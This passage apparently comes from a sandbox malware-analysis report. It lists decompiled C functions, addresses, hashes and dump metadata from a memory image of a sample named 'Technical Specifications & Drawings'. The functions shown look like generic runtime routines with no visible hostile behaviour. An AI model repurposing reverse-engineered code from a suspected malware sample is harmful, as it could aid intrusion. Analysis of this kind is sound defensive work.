				_t17 = L017DA840(__edx, __ecx, __ecx, _t52, 0x1897b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1897b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1897b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1897b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L017C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1897b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E017EF3E0(_t50,  *0x1897b14, _t8 >> 3);
						_t28 =  *0x1897b14; // 0x0
						__eflags = _t28 - 0x1897b0c;
						if(_t28 != 0x1897b0c) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1897b14 = _t50;
						_t48 = _v12;
						 *0x1897b10 = _t9;
						goto L6;
					}
					 *0x1897b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                  0x017da713
                                                  0x017da714
                                                  0x017da717
                                                  0x017da71d
                                                  0x017da720
                                                  0x017da722
                                                  0x017da727
                                                  0x017da74a
                                                  0x017da754
                                                  0x017da75e
                                                  0x017da768
                                                  0x017da76a
                                                  0x017da773
                                                  0x017da78b
                                                  0x017da790
                                                  0x017da792
                                                  0x017da741
                                                  0x017da741
                                                  0x017da743
                                                  0x017da749
                                                  0x017da749
                                                  0x017da732
                                                  0x017da73a
                                                  0x017da797
                                                  0x017da79d
                                                  0x017da7a3
                                                  0x017da7a9
                                                  0x017da7b6
                                                  0x017da7bc
                                                  0x017da7ca
                                                  0x017da7e0
                                                  0x017da7e2
                                                  0x017da7e4
                                                  0x01819bf2
                                                  0x00000000
                                                  0x01819bf2
                                                  0x017da7ed
                                                  0x017da7f2
                                                  0x017da800
                                                  0x017da805
                                                  0x017da80d
                                                  0x017da812
                                                  0x01819c08
                                                  0x01819c08
                                                  0x017da818
                                                  0x017da81b
                                                  0x017da821
                                                  0x017da824
                                                  0x00000000
                                                  0x017da824
                                                  0x017da7ae
                                                  0x00000000
                                                  0x017da7ae
                                                  0x017da73c
                                                  0x017da73e
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b9d3cd8940d23b8f30d80fd407af665c280ce6ed9d623bafa43138c4d15106d5
                                                  • Instruction ID: 12611f48301bc5f0936f218d90ad374bfc3bffdc736f3ed2d6f3bc7f8f3566b3
                                                  • Opcode Fuzzy Hash: b9d3cd8940d23b8f30d80fd407af665c280ce6ed9d623bafa43138c4d15106d5
                                                  • Instruction Fuzzy Hash: 41318DB17242099FD721CB18D890F69BBF9FB95710F19499AE206D7248D7B0AA01CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017D61A0 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 97%
                                                  			E017D61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E017D5E50(0x17867cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01879D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E017AF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                  0x017d61b3
                                                  0x017d61b5
                                                  0x017d61bd
                                                  0x017d61c3
                                                  0x017d61c7
                                                  0x017d61d2
                                                  0x017d61ff
                                                  0x017d61ff
                                                  0x017d6201
                                                  0x017d6207
                                                  0x017d6207
                                                  0x017d61d4
                                                  0x017d61d9
                                                  0x00000000
                                                  0x00000000
                                                  0x017d61df
                                                  0x017d61e2
                                                  0x00000000
                                                  0x00000000
                                                  0x017d61e6
                                                  0x017d61e8
                                                  0x017d61ee
                                                  0x017d61ee
                                                  0x017d61f9
                                                  0x0181762f
                                                  0x01817632
                                                  0x01817635
                                                  0x01817639
                                                  0x01817640
                                                  0x0181766e
                                                  0x01817675
                                                  0x00000000
                                                  0x00000000
                                                  0x01817681
                                                  0x01817689
                                                  0x0181768d
                                                  0x01817691
                                                  0x01817695
                                                  0x01817699
                                                  0x018176af
                                                  0x018176b5
                                                  0x018176b7
                                                  0x018176b7
                                                  0x018176d7
                                                  0x018176dc
                                                  0x00000000
                                                  0x018176dc
                                                  0x018176a2
                                                  0x018176a9
                                                  0x01817651
                                                  0x01817653
                                                  0x01817653
                                                  0x01817656
                                                  0x01817656
                                                  0x00000000
                                                  0x01817656
                                                  0x01817644
                                                  0x01817646
                                                  0x01817648
                                                  0x01817648
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12c913813e41327f6de5c6e4bc41f3d6194facb6b291409535e22ee2ce9e231d
                                                  • Instruction ID: df32566edd50ba5109a68123f672bc4171585d868a7e420195a64bcb1024a90c
                                                  • Opcode Fuzzy Hash: 12c913813e41327f6de5c6e4bc41f3d6194facb6b291409535e22ee2ce9e231d
                                                  • Instruction Fuzzy Hash: E8315A726093018FE320DF1DC800B2AFBE8EB88B10F05496DFA99DB255E771E944CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017AAA16 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E017AAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x189d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1897b9c; // 0x0
					_t53 = L017C4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E017EB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E017EF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L017B6C59(_t53, _t51, _t58) != 0) {
							_t28 = E017D5E50(0x178c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E017DB230(_v32, _v28, 0x178c2d8, 1,  &_v24);
								_t28 = E017AF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                  0x017aaa25
                                                  0x017aaa29
                                                  0x017aaa2d
                                                  0x017aaa30
                                                  0x017aaa37
                                                  0x017aaa3c
                                                  0x01804458
                                                  0x01804458
                                                  0x01804472
                                                  0x01804474
                                                  0x01804476
                                                  0x017aaa64
                                                  0x017aaa74
                                                  0x0180447c
                                                  0x01804483
                                                  0x01804492
                                                  0x017aaa52
                                                  0x017aaa54
                                                  0x017aaa5e
                                                  0x018044a8
                                                  0x018044ad
                                                  0x018044af
                                                  0x018044b6
                                                  0x018044b6
                                                  0x018044b9
                                                  0x018044bc
                                                  0x018044cd
                                                  0x018044d3
                                                  0x018044d6
                                                  0x018044e1
                                                  0x018044e1
                                                  0x018044e6
                                                  0x018044e8
                                                  0x018044fb
                                                  0x018044fb
                                                  0x018044e8
                                                  0x00000000
                                                  0x017aaa5e
                                                  0x01804476
                                                  0x017aaa42
                                                  0x017aaa46
                                                  0x017aaa48
                                                  0x017aaa4c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12f4b2183ac115bd32120c4cab68c0fa0e8eb352132b2e8d53783c1372cf1585
                                                  • Instruction ID: e34d28fe0137520ddbb687490464008aaa2cd3f39b3a79dfd5fdb68587d2f0fd
                                                  • Opcode Fuzzy Hash: 12f4b2183ac115bd32120c4cab68c0fa0e8eb352132b2e8d53783c1372cf1585
                                                  • Instruction Fuzzy Hash: E531E571A0061AABCF11AF68CD85ABFF7B8EF44700B41406DF901E7144E7349E11CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E8EC7 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E017E8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x189d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E017D4E70(0x18986e4, 0x17e9490, 0, 0);
					if( *0x18953e8 > 5 && E017E8F33(0x18953e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x18953e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x18953e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x178bc46;
						_t48 = E01827B9C(0x18953e8, 0x178bc46, _t67, 0x18953e8, _t70,  &_v140);
					}
				}
				return E017EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                  0x017e8ec7
                                                  0x017e8ed9
                                                  0x017e8edc
                                                  0x017e8ee6
                                                  0x017e8ee9
                                                  0x017e8eee
                                                  0x017e8efc
                                                  0x017e8f08
                                                  0x01821349
                                                  0x01821353
                                                  0x0182135d
                                                  0x01821366
                                                  0x0182136f
                                                  0x01821375
                                                  0x0182137c
                                                  0x01821385
                                                  0x01821390
                                                  0x01821391
                                                  0x0182139c
                                                  0x0182139d
                                                  0x018213a6
                                                  0x018213ac
                                                  0x018213b2
                                                  0x018213b5
                                                  0x018213bc
                                                  0x018213bf
                                                  0x018213c2
                                                  0x018213c5
                                                  0x018213c8
                                                  0x018213cb
                                                  0x018213ce
                                                  0x018213d1
                                                  0x018213d4
                                                  0x018213d7
                                                  0x018213da
                                                  0x018213dd
                                                  0x018213e0
                                                  0x018213e3
                                                  0x018213e6
                                                  0x018213e9
                                                  0x018213f6
                                                  0x01821400
                                                  0x01821400
                                                  0x017e8f08
                                                  0x017e8f32

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9b51354d830514e69cdcf087536c707eb38d01c83bd5654c4f77fe5565f77609
                                                  • Instruction ID: 770a2bbcd710e1a9e5aadb4681ead03f89b547c3661370159ef7d24c48fc4218
                                                  • Opcode Fuzzy Hash: 9b51354d830514e69cdcf087536c707eb38d01c83bd5654c4f77fe5565f77609
                                                  • Instruction Fuzzy Hash: 7A418FB1D002189FDB20CFAAD985AADFBF4FB49710F5041AEE549E7240E7745A84CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DE730 Relevance: .1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E017DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E017E9670() < 0) {
					E017FDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1897b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L017C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M017DE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                  0x017de730
                                                  0x017de736
                                                  0x017de738
                                                  0x017de73d
                                                  0x017de73e
                                                  0x017de740
                                                  0x017de749
                                                  0x017de765
                                                  0x017de76a
                                                  0x017de76b
                                                  0x017de76c
                                                  0x017de76d
                                                  0x017de76e
                                                  0x017de76f
                                                  0x017de775
                                                  0x017de777
                                                  0x017de77e
                                                  0x0181b675
                                                  0x017de784
                                                  0x017de784
                                                  0x017de789
                                                  0x017de7a8
                                                  0x017de7ac
                                                  0x017de807
                                                  0x017de7ae
                                                  0x017de7ae
                                                  0x017de7b1
                                                  0x017de7b4
                                                  0x017de7b9
                                                  0x017de7c0
                                                  0x017de7c4
                                                  0x017de7ca
                                                  0x017de7cc
                                                  0x00000000
                                                  0x017de7d3
                                                  0x017de7d6
                                                  0x00000000
                                                  0x00000000
                                                  0x017de7ff
                                                  0x017de802
                                                  0x00000000
                                                  0x00000000
                                                  0x017de7f9
                                                  0x017de7fc
                                                  0x00000000
                                                  0x00000000
                                                  0x017de7f3
                                                  0x017de7f6
                                                  0x00000000
                                                  0x00000000
                                                  0x017de7ed
                                                  0x017de7f0
                                                  0x00000000
                                                  0x00000000
                                                  0x017de7e7
                                                  0x017de7ea
                                                  0x00000000
                                                  0x00000000
                                                  0x0181b685
                                                  0x0181b688
                                                  0x00000000
                                                  0x00000000
                                                  0x0181b682
                                                  0x00000000
                                                  0x00000000
                                                  0x017de7cc
                                                  0x017de7d9
                                                  0x017de7dc
                                                  0x017de7de
                                                  0x017de7de
                                                  0x017de7ac
                                                  0x017de7e4
                                                  0x017de74b
                                                  0x017de751
                                                  0x017de759
                                                  0x017de761
                                                  0x017de761

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ab2d829ac3ace1c97a4b89afede2d41318c1e6591e1a7c471c5410253dc1849
                                                  • Instruction ID: 300e18d938d4d6835bd12b17433ba0fb3c5adacbf3230d274ae24d9f5cf93ef6
                                                  • Opcode Fuzzy Hash: 1ab2d829ac3ace1c97a4b89afede2d41318c1e6591e1a7c471c5410253dc1849
                                                  • Instruction Fuzzy Hash: 62318E75A14249EFD745CF58C845B9AFBF4FB08324F15825AFA04CB341DA31E980CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017DBC2C Relevance: .1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E017DBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1896100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E017C2280(0xd, 0x7aef1a0);
				_t41 =  *0x18960f8; // 0x0
				if(_t41 != 0) {
					 *0x18960f8 =  *_t41;
					 *0x18960fc =  *0x18960fc + 0xffff;
				}
				E017BFFB0(_t41, 0x800, 0x7aef1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x18960f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L017C4620(0x1896100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1896100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                  0x017dbc36
                                                  0x017dbc42
                                                  0x017dbc45
                                                  0x017dbc4a
                                                  0x017dbd35
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017dbc50
                                                  0x017dbc50
                                                  0x017dbc58
                                                  0x017dbc5a
                                                  0x017dbc60
                                                  0x00000000
                                                  0x00000000
                                                  0x0181a4f2
                                                  0x0181a4f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0181a4fc
                                                  0x017dbc79
                                                  0x017dbc7e
                                                  0x017dbc86
                                                  0x017dbd16
                                                  0x017dbd20
                                                  0x017dbd20
                                                  0x017dbc8d
                                                  0x017dbc94
                                                  0x017dbcbd
                                                  0x017dbcca
                                                  0x017dbccb
                                                  0x017dbccc
                                                  0x017dbccd
                                                  0x017dbcce
                                                  0x017dbcd4
                                                  0x017dbcea
                                                  0x017dbcee
                                                  0x017dbcf2
                                                  0x017dbd00
                                                  0x017dbd04
                                                  0x00000000
                                                  0x017dbc96
                                                  0x017dbcab
                                                  0x017dbcaf
                                                  0x017dbd2c
                                                  0x017dbd2c
                                                  0x017dbd09
                                                  0x00000000
                                                  0x017dbd09
                                                  0x017dbcb1
                                                  0x017dbcb5
                                                  0x017dbcbb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017dbcbb

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5280389a89e479466ebc96fab8f8e654031c520da834a9fad98319e88f8bfe6b
                                                  • Instruction ID: fbb18adf3cfaae5a0cdcfab896728f45dc334aa0f3ae83ba73500e705db7c81b
                                                  • Opcode Fuzzy Hash: 5280389a89e479466ebc96fab8f8e654031c520da834a9fad98319e88f8bfe6b
                                                  • Instruction Fuzzy Hash: 4731F27660061A9FCB21DF58C4C07A6B7B4FF19310F1A0079ED49EB20AFB74DA498B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A9100 Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E017A9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x187f6e8);
				E017FD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E018788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E017FD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x18986c0; // 0x12607b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x18986b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E017C2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E018788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E017EAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
